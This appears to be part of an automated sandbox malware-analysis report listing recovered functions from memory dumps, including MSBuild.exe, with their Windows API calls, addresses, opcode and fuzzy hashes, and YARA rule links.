                                                        • Opcode ID: 8ba7f7c402a0ae9781ddbcffa849165cb84ee1b587bdd225bfc81bda4850e8f9
                                                        • Instruction ID: 1442734af9b138846c658be65e800d097aa4b313923513325d4a7400aaf9d66a
                                                        • Opcode Fuzzy Hash: 8ba7f7c402a0ae9781ddbcffa849165cb84ee1b587bdd225bfc81bda4850e8f9
                                                        • Instruction Fuzzy Hash: CF8168B1D04209DFDF10DFA9D8806DEBBB1FF89304F21812AD815AB240DB74A949DF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 054193E8, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0541962E
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1046034257.0000000005410000.00000040.00000001.sdmp, Offset: 05410000, based on PE: false
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 36d49989d9b46cebe71c6f7ba1669f95c82634e2295c7d4873b84e7c73a05377
                                                        • Instruction ID: cd2a2dbebf1d60947a3f5691e2b9adfc47319fe2472805d752e1809c9391c1e9
                                                        • Opcode Fuzzy Hash: 36d49989d9b46cebe71c6f7ba1669f95c82634e2295c7d4873b84e7c73a05377
                                                        • Instruction Fuzzy Hash: 7B712370A04B058FD724CF2AC45479BBBF2BF88214F008A6ED88AD7B40DB74E8058B95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0541FB20, Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0541FD0A
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1046034257.0000000005410000.00000040.00000001.sdmp, Offset: 05410000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: 130c18c2fa35591eafcfba78446a22afe1e65194e2b45bc79eb31f33e87939eb
                                                        • Instruction ID: 21ad740875a77adda68b07eda50a7609b3421eb123a947e68c9707512a04b706
                                                        • Opcode Fuzzy Hash: 130c18c2fa35591eafcfba78446a22afe1e65194e2b45bc79eb31f33e87939eb
                                                        • Instruction Fuzzy Hash: 6D6158B1C04348AFCB15CFA9D884ADEBFB1FF49310F18816AE815AB252D7749946CF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0541FB98, Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0541FD0A
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1046034257.0000000005410000.00000040.00000001.sdmp, Offset: 05410000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: b6bd875a4440de0a4626f3b830e7c452c11d75d58b6b4c2e53877c94dda89ac5
                                                        • Instruction ID: d336d578450c20396698a9012e3c132e7d8324c1f0f275c2f3dc7bb1182f7aee
                                                        • Opcode Fuzzy Hash: b6bd875a4440de0a4626f3b830e7c452c11d75d58b6b4c2e53877c94dda89ac5
                                                        • Instruction Fuzzy Hash: 025122B1C04249AFCF01CFA9D884ADEBFB1FF48314F15816AE819AB221D7719855CF60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A71905, Relevance: 1.6, APIs: 1, Instructions: 144networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DnsQuery_A.DNSAPI(?,?,?,?,?,?), ref: 06A73738
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1047696391.0000000006A70000.00000040.00000001.sdmp, Offset: 06A70000, based on PE: false
                                                        Similarity
                                                        • API ID: Query_
                                                        • String ID:
                                                        • API String ID: 428220571-0
                                                        • Opcode ID: 6988ba98904bcbed613289ab2128acb44929fbb3f40525cd04067de38aa3f426
                                                        • Instruction ID: 3c43f2ae235800e81cce84579cb9888858975ef1003a45088a3461572881f54f
                                                        • Opcode Fuzzy Hash: 6988ba98904bcbed613289ab2128acb44929fbb3f40525cd04067de38aa3f426
                                                        • Instruction Fuzzy Hash: 805134B1D04219DFDF50DFA9C8806DEBBB1FF48304F21802AE815AB250DBB0A946DF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A73604, Relevance: 1.6, APIs: 1, Instructions: 141networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DnsQuery_A.DNSAPI(?,?,?,?,?,?), ref: 06A73738
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1047696391.0000000006A70000.00000040.00000001.sdmp, Offset: 06A70000, based on PE: false
                                                        Similarity
                                                        • API ID: Query_
                                                        • String ID:
                                                        • API String ID: 428220571-0
                                                        • Opcode ID: ef3d931710bf9611e0c7413ba234814c833d90e3047f2b1a70f11ab0c9491198
                                                        • Instruction ID: d2065901a59df39f8affd1a6dc97ddd2b6d585a96213e75b918749581f0644e6
                                                        • Opcode Fuzzy Hash: ef3d931710bf9611e0c7413ba234814c833d90e3047f2b1a70f11ab0c9491198
                                                        • Instruction Fuzzy Hash: 835122B1D002199FDF50DFA9C880ADEBBB1FF48304F25802AE815AB240DBB4A945DF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A7190C, Relevance: 1.6, APIs: 1, Instructions: 140networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DnsQuery_A.DNSAPI(?,?,?,?,?,?), ref: 06A73738
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1047696391.0000000006A70000.00000040.00000001.sdmp, Offset: 06A70000, based on PE: false
                                                        Similarity
                                                        • API ID: Query_
                                                        • String ID:
                                                        • API String ID: 428220571-0
                                                        • Opcode ID: ea47dc266dd007bcd0c4453882c34306984381a0a510a09a76af85a2adab4bf8
                                                        • Instruction ID: 5dc34644232bf7416c6663e34fc7e05914f776a5464ef2188ff2d606d82a3933
                                                        • Opcode Fuzzy Hash: ea47dc266dd007bcd0c4453882c34306984381a0a510a09a76af85a2adab4bf8
                                                        • Instruction Fuzzy Hash: 2A5113B1D002199FDF50DFA9D884ADEBBB1FF48304F21812AE815AB250DBB4A945DF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0541DA04, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0541FD0A
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1046034257.0000000005410000.00000040.00000001.sdmp, Offset: 05410000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: 73507fda70e2b7f3e4ccbc337c52b79e4edc5d6941eccb11330ffc56cd0a4f28
                                                        • Instruction ID: df028156efe90ea315fbf43112e017780ea3e498abf20e0dd2bada0f1326317f
                                                        • Opcode Fuzzy Hash: 73507fda70e2b7f3e4ccbc337c52b79e4edc5d6941eccb11330ffc56cd0a4f28
                                                        • Instruction Fuzzy Hash: F851BEB1D04309EFDB14CF99D884ADEBBB5FF48314F24812AE819AB210D7759846CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0541A14C, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0541BCC6,?,?,?,?,?), ref: 0541BD87
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1046034257.0000000005410000.00000040.00000001.sdmp, Offset: 05410000, based on PE: false
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 44a2f46e3a3e6acaa2e0968e0f66d976f2ba3c71709427ce9749f428b194c2f1
                                                        • Instruction ID: b29f9f9fcb0e5873c1f2a8376f11a27554a210911081d0eb69f0848143ceb273
                                                        • Opcode Fuzzy Hash: 44a2f46e3a3e6acaa2e0968e0f66d976f2ba3c71709427ce9749f428b194c2f1
                                                        • Instruction Fuzzy Hash: E621E4B590420CEFDB10CF99D884ADEBBF4FB48324F14801AE955A3310D378A954CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0541BCF9, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0541BCC6,?,?,?,?,?), ref: 0541BD87
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1046034257.0000000005410000.00000040.00000001.sdmp, Offset: 05410000, based on PE: false
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: f3dbfe047bdf4ac94cf0450cd5cb0fc9e2723c3c4cad1044d1a68a0dcc974f69
                                                        • Instruction ID: 2325f563f8d4cb94da327b13345d1c394da74ef83c5e14cb1db1f8343e7528b4
                                                        • Opcode Fuzzy Hash: f3dbfe047bdf4ac94cf0450cd5cb0fc9e2723c3c4cad1044d1a68a0dcc974f69
                                                        • Instruction Fuzzy Hash: 2E21E4B5900248EFDB10CFA9D584ADEBBF4FB48324F14841AE954B3310C378A954CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05418768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,054196A9,00000800,00000000,00000000), ref: 054198BA
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1046034257.0000000005410000.00000040.00000001.sdmp, Offset: 05410000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 7ef806d2715338360e0fd4c70269c765744c0644eded6f8e1bad2af14a2b6c66
                                                        • Instruction ID: dd05ab70634b37221a31f5cef2530277067ac6c1bf0ca3d42bd9127fffa2feb4
                                                        • Opcode Fuzzy Hash: 7ef806d2715338360e0fd4c70269c765744c0644eded6f8e1bad2af14a2b6c66
                                                        • Instruction Fuzzy Hash: EB11C2B69042099FDB10CF9AD448BDEBBF4EB88324F14842EE915A7600C775A945CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05419849, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,054196A9,00000800,00000000,00000000), ref: 054198BA
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1046034257.0000000005410000.00000040.00000001.sdmp, Offset: 05410000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: bd525d4978954c8f4f3e6c13d493f2bc837234f89142557d937d3c24fcddae52
                                                        • Instruction ID: 9a8c28924d387d0129cf24e2c07617a851871a85673da5b6b73bb540256ae795
                                                        • Opcode Fuzzy Hash: bd525d4978954c8f4f3e6c13d493f2bc837234f89142557d937d3c24fcddae52
                                                        • Instruction Fuzzy Hash: 4B11C2B69042099FDB10CF9AD448ADEBBF4EB88324F14842EE819A7600C775A545CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 054195C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0541962E
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1046034257.0000000005410000.00000040.00000001.sdmp, Offset: 05410000, based on PE: false
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 287c9ff6eb9b055a311c57c1fa6f625c1df0f6d772ad599d705d4d2ea7abde76
                                                        • Instruction ID: 4a1de4e7c3325fd70b65d1f7f7d83a774972930eccee8a59f60d0f702d2e3582
                                                        • Opcode Fuzzy Hash: 287c9ff6eb9b055a311c57c1fa6f625c1df0f6d772ad599d705d4d2ea7abde76
                                                        • Instruction Fuzzy Hash: 4A11DFB6D006498FCB10CF9AD444BDEFBF4AB89324F14846AD829A7600C375A546CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0541FE38, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0541FE28,?,?,?,?), ref: 0541FE9D
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1046034257.0000000005410000.00000040.00000001.sdmp, Offset: 05410000, based on PE: false
                                                        Similarity
                                                        • API ID: LongWindow
                                                        • String ID:
                                                        • API String ID: 1378638983-0
                                                        • Opcode ID: ef7d2510fddec50d9247985f0d1aed7cdf2ff7cd140a883831995d632a7fa505
                                                        • Instruction ID: f381cffe4243dc070357f1bcb14b6d9ff890ee1dfa9fb59a7c9573ca272db589
                                                        • Opcode Fuzzy Hash: ef7d2510fddec50d9247985f0d1aed7cdf2ff7cd140a883831995d632a7fa505
                                                        • Instruction Fuzzy Hash: 4611F2B58002099FDB10CF99D489BDEBBF8FB48324F10841AE855A3701C374A945CFB5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0541DA3C, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0541FE28,?,?,?,?), ref: 0541FE9D
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1046034257.0000000005410000.00000040.00000001.sdmp, Offset: 05410000, based on PE: false
                                                        Similarity
                                                        • API ID: LongWindow
                                                        • String ID:
                                                        • API String ID: 1378638983-0
                                                        • Opcode ID: 3d819dd748d75e2740e5753ea60ce7d8f20635792a7fe072611ba57c215708ff
                                                        • Instruction ID: 57052becd9df2e9eb17b416c5cb314f6a19037e4214fe4ded8b15c9c9d17091e
                                                        • Opcode Fuzzy Hash: 3d819dd748d75e2740e5753ea60ce7d8f20635792a7fe072611ba57c215708ff
                                                        • Instruction Fuzzy Hash: 8E11E0B58002499FDB10CF99D489BDEBBF8EB48324F10845AE915A7741C3B4A945CFB9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02CDD4A0, Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1042305431.0000000002CDD000.00000040.00000001.sdmp, Offset: 02CDD000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a1845055f94aea6f202872d658d2e8e845eb85af9b07b201f6e20a65c10391d8
                                                        • Instruction ID: ec9a1612f38d355c0010198bca60f7b32f9ca520f519aafa5c2a7448ba95a4fb
                                                        • Opcode Fuzzy Hash: a1845055f94aea6f202872d658d2e8e845eb85af9b07b201f6e20a65c10391d8
                                                        • Instruction Fuzzy Hash: 672148F2904200DFDB05DF14D8C0F26BFA5FBC8328F248569EA060B206C336E946CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02CED01C, Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1042326033.0000000002CED000.00000040.00000001.sdmp, Offset: 02CED000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7aa5c368a59cef3169b484d4784ca58ce9d9b0609b050e5eb9ccdfb078d0b662
                                                        • Instruction ID: bf42a402b2ecaf189f24d8f453219d060e69aa737771de41655e8cac6eeb4d24
                                                        • Opcode Fuzzy Hash: 7aa5c368a59cef3169b484d4784ca58ce9d9b0609b050e5eb9ccdfb078d0b662
                                                        • Instruction Fuzzy Hash: F521C2B5604240DFDF14DF14D9C4B26BBA9FB88314F28C9A9E94B4B246C376D847CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02CED005, Relevance: .1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1042326033.0000000002CED000.00000040.00000001.sdmp, Offset: 02CED000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 93ea5f2ed92e524929ff91a4e34219b0a818353850bfed8f4ae09ca04fc96b9f
                                                        • Instruction ID: c921ccc50ff37af0a2e27c5792fa327148e2a79c0cca488ca83819172c09e584
                                                        • Opcode Fuzzy Hash: 93ea5f2ed92e524929ff91a4e34219b0a818353850bfed8f4ae09ca04fc96b9f
                                                        • Instruction Fuzzy Hash: 2C2162755093C08FCB12CF24D594715BF71EB86214F28C5EAD84A8B667C33A994ACBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02CDD49B, Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1042305431.0000000002CDD000.00000040.00000001.sdmp, Offset: 02CDD000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: abf9d05837f20679d6678064280a21b40d007861ebc24b3ccb10da70a24719c3
                                                        • Instruction ID: a10c90c43f5405d22b550d657536b794089bb8b81eb0e46a1876a1169d12d139
                                                        • Opcode Fuzzy Hash: abf9d05837f20679d6678064280a21b40d007861ebc24b3ccb10da70a24719c3
                                                        • Instruction Fuzzy Hash: CF11D3B6904280DFCF12CF14D9C4B16BF71FB84324F28C6A9D9050B616C336D556CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Analysis Process: MSBuild.exe PID: 6908 Parent PID: 968 MSBuild.exeCOMMON

                                                        Executed Functions

                                                        Function 006C18C0, Relevance: 3.0, Strings: 2, Instructions: 484COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "$zp
                                                        • API String ID: 0-4273287978
                                                        • Opcode ID: f9e20ad768e4e19cef967f52604716aa29bfd5f7c50c70eaa87dcc63099b955b
                                                        • Instruction ID: 0f569e9622a5a55cff868a7a4ac15b8d79e37f5bd5eabce3a17e6c8e5d48f5f1
                                                        • Opcode Fuzzy Hash: f9e20ad768e4e19cef967f52604716aa29bfd5f7c50c70eaa87dcc63099b955b
                                                        • Instruction Fuzzy Hash: B4028C34A045158FDB04DFA8C450BBEB7F3EF8A300F148569E416DB3A6DB74AD468B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C4A20, Relevance: 1.9, Strings: 1, Instructions: 606COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID: a
                                                        • API String ID: 0-3904355907
                                                        • Opcode ID: 2bbc8c854b873d649e809bae90a2f3c4abe189da2d0189b730bc485294ad7180
                                                        • Instruction ID: 07f0536719bd5712fa17c684d33d7820b98964d31eed0a32f26fd06e334c1cc9
                                                        • Opcode Fuzzy Hash: 2bbc8c854b873d649e809bae90a2f3c4abe189da2d0189b730bc485294ad7180
                                                        • Instruction Fuzzy Hash: E9424934600604CFCB14DF68C994FAABBF3EF89301F4A85A9E4168B665DB34ED85CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C2148, Relevance: 1.6, Instructions: 1619COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1e09d9f58fee5a53afbf47b0c8ab858acd584323e48f901ce53800ddde6c1f00
                                                        • Instruction ID: d960190ec36a9c6ee8d35a0a3eda02c98ffc840420c703b876a449949f279a70
                                                        • Opcode Fuzzy Hash: 1e09d9f58fee5a53afbf47b0c8ab858acd584323e48f901ce53800ddde6c1f00
                                                        • Instruction Fuzzy Hash: DDE2A131A502199BD721EF60CC44BEDB3B7EFD9704F5285A8A6083B295DFB06A81CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C2133, Relevance: 1.6, Instructions: 1597COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 00097df28ba6b454ff6ebb8f106023af8b247c2fb3237fcf21840d95b754bde2
                                                        • Instruction ID: df972d4d99331f197c32a73cd67442906ca6d78f215089f3243a9dbe0eab8e51
                                                        • Opcode Fuzzy Hash: 00097df28ba6b454ff6ebb8f106023af8b247c2fb3237fcf21840d95b754bde2
                                                        • Instruction Fuzzy Hash: 65E2A131A502199BD721EF60CC44BEDB3B7EFD9704F5285A8A6083B295DFB06A81CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C5CF9, Relevance: .4, Instructions: 381COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 893f37aaccc02aa49236a5d2fcca59450f49959c1c0a0eb709ea1cb28d2c2950
                                                        • Instruction ID: bf1d76f9f9e9c7b9e9c15b7c1cd2189bcc3aab90d94d7e03a37bfc031dbd1db4
                                                        • Opcode Fuzzy Hash: 893f37aaccc02aa49236a5d2fcca59450f49959c1c0a0eb709ea1cb28d2c2950
                                                        • Instruction Fuzzy Hash: 5DD19C307016008FD729DB25D994BBAB7E3EF89305F14846DE8169B796CB35EC86CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C0448, Relevance: 2.6, Strings: 2, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID: d-%l$d-%l
                                                        • API String ID: 0-2065804076
                                                        • Opcode ID: 0522afffbb0d2b6c6bff97c1e1f35a105c90c08180a1708310cf2c1ee6ce3db3
                                                        • Instruction ID: 9b379ed4c607e4d22628d0f9c4363fa2c871ce074bd2f803aa9abf8d2548b4fa
                                                        • Opcode Fuzzy Hash: 0522afffbb0d2b6c6bff97c1e1f35a105c90c08180a1708310cf2c1ee6ce3db3
                                                        • Instruction Fuzzy Hash: AA419F74E052089FDB44EFB8D455B9EB7F6AF84304F00842AD105AF3A5EB749D06CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C0C68, Relevance: 1.5, Strings: 1, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID: bnp
                                                        • API String ID: 0-527036745
                                                        • Opcode ID: 7aca889b9b4cc6fee9f38cc7c6ab0d68d0cd68fc1c4fb9f26ce21765dcfd9459
                                                        • Instruction ID: a4aabf6e4960834ff731fd32fa17bc49d9b9dc5b5504bd4cd832c6e197786991
                                                        • Opcode Fuzzy Hash: 7aca889b9b4cc6fee9f38cc7c6ab0d68d0cd68fc1c4fb9f26ce21765dcfd9459
                                                        • Instruction Fuzzy Hash: AE914D71A00208DFDB05DFE5D854AEEBBFAEF88304F14852AE512AB354DB749906CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C0B70, Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID: mp
                                                        • API String ID: 0-3247404585
                                                        • Opcode ID: ec3a24e8a6bed62d0fad7905cbca71cece1dc91c0f433995606b348504a23269
                                                        • Instruction ID: 50615d1917bcdee6a24c8231ccb095a850dd189c94c831d02bd31f818ad0d486
                                                        • Opcode Fuzzy Hash: ec3a24e8a6bed62d0fad7905cbca71cece1dc91c0f433995606b348504a23269
                                                        • Instruction Fuzzy Hash: DDE0C271A0E2408EE75293746820AB53BF18B12304F1045AFE859D7763D1854C408751
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C532C, Relevance: .4, Instructions: 441COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ee97dc6023172934a34dbf991900c958e0c12060bfb80ad43416cacc0a55a8c8
                                                        • Instruction ID: 623d2b6043c8a124cd61548159237abe0942f497aabb89b40d1ca48a2937470a
                                                        • Opcode Fuzzy Hash: ee97dc6023172934a34dbf991900c958e0c12060bfb80ad43416cacc0a55a8c8
                                                        • Instruction Fuzzy Hash: C821C530A086558FDB15EBB5CC11BFD7BE3AB89304F54452DC402EB3A1DB75A942CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C4358, Relevance: .2, Instructions: 204COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e3475b23ade0124e5dbdbb64558d48a29d168bf3978062da4f284aa656e81bf1
                                                        • Instruction ID: 4ac8bc1e8856619c661c8d735a3aac7647a4223304215055406436f6e692f59c
                                                        • Opcode Fuzzy Hash: e3475b23ade0124e5dbdbb64558d48a29d168bf3978062da4f284aa656e81bf1
                                                        • Instruction Fuzzy Hash: 73815530A052089FDB18DF69D894FAABBF3EF84314F118569E4059B365DB70EC4ACB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C1EB0, Relevance: .2, Instructions: 202COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4880507ea964247af0cd34161730dcb51ccd2589a92370837f6b525ac91019ab
                                                        • Instruction ID: e1d2f177967951beeeb31eb2642bd1836e6ecedef57095af66b8b400ecf34033
                                                        • Opcode Fuzzy Hash: 4880507ea964247af0cd34161730dcb51ccd2589a92370837f6b525ac91019ab
                                                        • Instruction Fuzzy Hash: 29713B707002099BDB14DB64C954BAEB7E7EF89304F148529E912AB391DBB0ED46CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C13C8, Relevance: .2, Instructions: 155COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 582e51284ebb580007c4e62986cfc4719afedfebfcbf18efd77f6c1adf643df3
                                                        • Instruction ID: 1583a5e870445d7d5c495596733a64429ba32e0768fe7c389519749a1aa702ca
                                                        • Opcode Fuzzy Hash: 582e51284ebb580007c4e62986cfc4719afedfebfcbf18efd77f6c1adf643df3
                                                        • Instruction Fuzzy Hash: F6519F71E042589FCB19DB7598146FEBBB2EFC6310F04C07AD509EB392E7344A168B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C3CF8, Relevance: .2, Instructions: 153COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8857a7a57b00eb64c2d78c059e5c0fa125bf57ff793741431ff5351cf0180f4c
                                                        • Instruction ID: 3599b5ef2398c3b699c38d05a9098f67c23a6a785f1510ea6e1b2a5703794ea3
                                                        • Opcode Fuzzy Hash: 8857a7a57b00eb64c2d78c059e5c0fa125bf57ff793741431ff5351cf0180f4c
                                                        • Instruction Fuzzy Hash: 50517E31A002699FCB11CFA9D840AEDFBF2FF49310F1581AAD855A7351D730AE45CBA0
                                                        Uniqueness

